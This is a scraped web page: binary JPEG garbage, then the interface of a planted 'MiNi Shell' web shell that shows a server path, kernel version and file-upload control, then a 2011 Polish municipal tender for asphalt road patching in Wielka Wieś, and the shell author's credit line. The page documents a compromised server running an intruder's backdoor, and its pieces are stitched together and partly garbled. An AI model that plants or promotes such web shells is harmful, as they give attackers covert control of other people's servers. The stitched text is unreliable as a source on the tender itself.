JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110119/8770-N-2011.html

<p class="kh_header"><b>Wielka Wieś: Remont cząstkowy nawierzchni bitumicznej dróg będących w zarządzie Gminy Wielka Wieś w roku 2011 na szacunkowej powierzchni 1.715 m2</b><br>
<b>Numer ogłoszenia: 8770 - 2011; data zamieszczenia: 19.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni bitumicznej dróg będących w zarządzie Gminy Wielka Wieś w roku 2011 na szacunkowej powierzchni 1.715 m2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:

Remont cząstkowy nawierzchni bitumicznej dróg będących w zarządzie Gminy Wielka Wieś w roku 2011 na szacunkowej powierzchni 1.715 m2

2. Wstęp

Przedmiotem niniejszej specyfikacji  są wymagania dotyczące wykonania remontu nawierzchni bitumicznych na drogach wskazanych przez Zamawiającego na szacunkowej  powierzchni 1.715 m2 w tym: 
- emulsją asfaltową szybkorozpadową i gresami za pomocą w pełni zautomatyzowanego remontera drogowego przy średniej głębokości ubytków 5 cm na szacunkowej powierzchni 1. 650 m2 
-  asfaltem lanym z obcięciem krawędzi przy średniej głębokości ubytków 5 cm na szacunkowej powierzchni 65 m2  

Remont nawierzchni bitumicznej jest to określenie obejmujące różne zabiegi techniczne do natychmiastowego wykonania, związane z usuwaniem uszkodzeń zagrażających bezpośrednio bezpieczeństwu ruchu i pozwalające na uzyskanie równej nawierzchni jezdni.

3. Wykonanie robót, rodzaje materiałów do wykonania remontów nawierzchni bitumicznych, sprzęt.


3.1. Kruszywo
Do remontu nawierzchni bitumicznych należy stosować grysy odpowiadające wymaganiom normy PN-B-11112 klasy I gat.1, z tym, że wprowadza się zwiększone wymagania dotyczące czystości i zawartości ziaren nieforemnych:
a)	zawartość ziaren mniejszych od 0.075 mm odsianych na mokro, nie więcej niż 0.5% (m/m)
b)	zawartość ziaren nieforemnych nie więcej niż 20% (m/m)
c)	do remontu należy stosować kruszywo o wąskich frakcjach uziarnienia 2-5/5-8/4-6.3 oraz 6.3-10 /w przypadku głębokich ubytków i stosowania 2 frakcji grysów/, przy czym ilość nadziarna i podziarna powinna być jak najmniejsza.
Dopuszcza się stosowanie wąskich frakcji o wymiarach innych niż wyżej podane pod warunkiem, że zostaną zaakceptowane przez Zamawiającego.
Do wykonania remontów nawierzchni bitumicznych zaleca się użycie kruszywa płukanego ze skał magmowych.
Wbudowane grysy muszą posiadać atest.


3.2. Składowanie materiałów
Wykonawca winien dysponować placem o utwardzonej nawierzchni, z zadaszoną wiatą na składowanie grysu. 

3.3. Lepiszcze
Do remontu nawierzchni bitumicznych należy stosować kationową emulsję asfaltową szybkorozpadową, spełniającą wymogi zawarte w ogólnych specyfikacjach technicznych 
D-05.03.08 Nawierzchnia powierzchniowo utrwalana wyd. przez GDDP. Każda zakupiona przez wykonawcę partia emulsji winna posiadać świadectwo jakości.

3.4. Sprzęt

Do wykonania remontu nawierzchni bitumicznych należy stosować remonter drogowy zautomatyzowany, który na wyposażeniu posiada :
-	jeden zbiornik na 1 frakcję grysu lub dwa zbiorniki na dwie frakcje grysu,
-	kompresor o dużej wydajności tłoczonego powietrza, zapewniający dokładne oczyszczenie uszkodzonej nawierzchni, usuwający z wypełnianych ubytków pyły, drobne, luźne kruszywo, wodę oraz wszelkie inne zanieczyszczenia, zbiornik na emulsję,
-	urządzenie do produkcji i wbudowania mieszanki / grys + emulsja /.

3.5. Technologia robót

Poprzez zamontowany w maszynie kompresor są czyszczone miejsca uszkodzonej nawierzchni. Po spryskaniu emulsją naprawionego uszkodzenia w nawierzchni zostanie utworzona dobra warstwa klejąca, następnie poprzez włączenie ślimaków uruchomione zostaje podawanie grysu do głowicy mieszającej grys z emulsją. Powstała mieszanka z dużą prędkością wdmuchiwana jest w naprawione miejsca. Materiał wbudowany jest dobrze uszczelniony. Po wierzchu remontowaną powierzchnię należy posypać suchym grysem. 
Przy dużych ubytkach można stosować dwie frakcje grysów.

4. Oznakowanie robót

Ze względu na to, że remont nawierzchni wykonywany jest pod ruchem, konieczne jest właściwe oznakowanie odcinka robót.
Oznakowanie powinno być zgodne z instrukcją oznakowania robót w pasie drogowym stanowiącą zał. nr 1 do zarządzenia Ministra Transportu i Gospodarki Morskiej oraz Spraw Wewnętrznych nr 184 z dnia 6 czerwca 1990 roku / Monitor Polski nr 24 z 1990r., poz.184 /, oraz Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 10 października 2000 roku / Dz. U. Nr 90, poz. 1006 /, w sprawie szczegółowych warunków zarządzania ruchem na drogach.
Za prawidłowość oznakowania robót w obrębie odcinka, na którym jest wykonywany remont nawierzchni, od chwili rozpoczęcia robót aż do ich zakończenia, odpowiedzialny jest Wykonawca robót.

5. Kontrola jakości robót

Roboty winny być wykonywane przez Wykonawcę zgodnie z dokumentami przetargowymi i zgodnie z zasadami wiedzy technicznej.

Przed rozpoczęciem robót należy ocenić stan istniejącej nawierzchni i wspólnie z Inspektorem Nadzoru ustalić sposób jej naprawy

5.1. Badania i kontrola w trakcie wykonywania remontu

W trakcie wykonywania napraw uszkodzeń nawierzchni należy kontrolować:
-	czystość remontowanej nawierzchni,
-	głębokość ubytków,
-	ilość / powierzchnię/ wykonanego remontu,
-	równość naprawianych uszkodzeń,
-	jakość użytych materiałów.

6. Odbiór wykonanych robót

Odbiory robót będą przeprowadzane jako odbiory częściowe, po wykonaniu każdego przekazanego zakresu robót.
Odbioru dokonuje inspektor nadzoru wyznaczony przez Zamawiającego w obecności przedstawicieli Wykonawcy.
Odbiór częściowy polegać będzie na obmiarze zakresu i ocenie jakości wykonanych robót, na podstawie:
-	rejestrów obmiarów,

Badania przy odbiorze obejmują ocenę wizualną wyglądu zewnętrznego, jednorodności wyremontowanej nawierzchni, równości szorstkości oraz szczelności struktury.
Gotowość danej części robót do odbioru Wykonawca zgłasza wpisem do dziennika obmiaru robót z powiadomieniem Zamawiającego.
Zamawiający jest zobowiązany dokonać odbioru do 7 - dni od daty zgłoszenia.
W przypadku stwierdzenia, złej jakości robót Wykonawca wykona roboty poprawkowe w terminie 7-dni od daty odbioru częściowego.
Wykonawca będzie rozliczany wg ilości m2 wyremontowanej nawierzchni dróg.

7. Podstawa płatności

Cena jednostki obmiarowej 1m2 (jednego metra kwadratowego) remontu nawierzchni wykonanego emulsją i grysami obejmuje:
-	prace pomiarowe i roboty przygotowawcze,
-	oznakowanie robót,
-	transport i składowanie kruszyw,
-	transport i składowanie lepiszczy,
-	dostawę i pracę sprzętu do robót,
-	przygotowanie powierzchni nawierzchni do wykonania remontu (ocena, oczyszczenie)
-	wbudowanie lepiszcza i kruszywa,
-	prowadzenie obmiarów robót,
-	ewentualne wykonanie badań laboratoryjnych użytych materiałów, 
Należność za wykonane roboty będzie wyliczana przez Wykonawcę na podstawie potwierdzonego przez inspektora nadzoru obmiaru robót uwzględniającego powierzchnię wyremontowanych ubytków występujących na danym odcinku drogi. Pomierzona powierzchnia wykonanego remontu będzie stanowić podstawę do wyliczenia średniej głębokości wyremontowanych wybojów. Cena jednostkowa podana w formularzu cenowym dla wyliczonej średniej głębokości wybojów będzie interpolowana w sposób liniowy.

9. Informacje dodatkowe

9.1. Wszystkie roboty należy wykonać zgodnie z zasadami BHP i zgodnie z zasadami wiedzy technicznej.
9.2. Wykonawca na wezwanie Zamawiającego wykona roboty naprawcze związane z likwidacją tych przełomów na drogach w terminie 24 godzin od zgłoszenia telefonicznego takiej potrzeby przez Zamawiającego i niezależnie od warunków atmosferycznych. 
9.3. Wykonawca informować będzie telefonicznie Zamawiającego każdorazowo o planowanym rozpoczęciu robót na poszczególnych drogach będących w zarządzie gminy.
9.4. W oferowanej przez Wykonawcę cenie za wykonanie zadania, uwzględnione będą ponadto inne prace, nieokreślone w przedmiocie robót a niezbędne do wykonania zamówienia takie jak np.: 
-   w miarę potrzeb zapewnienie uzgodnienia i wykonanie organizacji ruchu na czas robót z  bieżącym utrzymaniem oznakowania i jego likwidacją po zakończeniu robót oraz utrzymanie dojść i dojazdów do przyległych posesji, Pomierzona powierzchnia wykonanego remontu będzie stanowić podstawę do wyliczenia średniej głębokości wyremontowanych wybojów. Cena jednostkowa podana w formularzu cenowym dla wyliczonej średniej głębokości wybojów będzie interpolowana w sposób liniowy.
-    wszelkie inne roboty konieczne do wykonania zamówienia.
9.5. Po zakończeniu robót Wykonawca zobowiązany jest uporządkować teren budowy i przekazać go Zamawiającemu w ustalonym terminie.
9.6. Materiał z obróbki Wykonawca zagospodaruje we własnym zakresie, uwzględniając koszty związane z  odwozem oraz ewentualną utylizacją.
9.7. Prace remontowe winny być wykonane zgodnie ze sztuką oraz wiedzą techniczną ze szczególnym uwzględnieniem faktu, iż ubytki w jezdni należy wypełniać masą bitumiczną po oskardowaniu, oczyszczeniu oraz ewentualnym osuszeniu miejsca przeznaczonego do wypełnienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże  wykonanie  w okresie ostatnich pięciu   lat przed 
upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 1  robotę budowlaną odpowiadającą swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia o  wartości 50 tys. zł każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie  minimum  :
-1  kierownikiem budowy z uprawnieniami w specjalności drogowej. 
- 1 osobą uprawnioną do kierowania ruchem drogowym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie  sprzętem  niezbędnym  do prawidłowego wykonania przedmiotu zamówienia Wymagane minimum  potencjału technicznego to : 
- remonter drogowy szt. 1 ( skrapiarka) zautomatyzowany, który na wyposażeniu posiada:
jeden zbiornik na jedną frakcję grysu lub dwa zbiorniki na dwie frakcje grysu.
kompresor o dużej wydajności tłoczonego powietrza, zapewniający dokładne oczyszczenie uszkodzonej nawierzchni usuwający z wypełnianych ubytków pyły, drobne, luźne kruszywo, wodę oraz wszelkie inne zanieczyszczenia, zbiornik na emulsję.
 urządzenie do produkcji i wbudowania mieszanki / grys + emulsja/- skrapiarka
- płyty zagęszczające - szt.2
- samochód samowyładowczy  - szt. 1 
- remonter do asfaltu lanego - szt.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz OFERTA - załącznik nr 1 do SIWZ.
Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika 
z innych dokumentów dołączonych do oferty.
Kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:
- zmian regulacji prawnych obowiązujących w dniu podpisania umowy
- gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do dokonania czynności, zmiana danych teleadresowych, określonych w niniejszej umowie.
- w przypadku nie wykorzystania w całości kwoty umowy o której mowa w art.12  niniejszej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2011 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś, Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com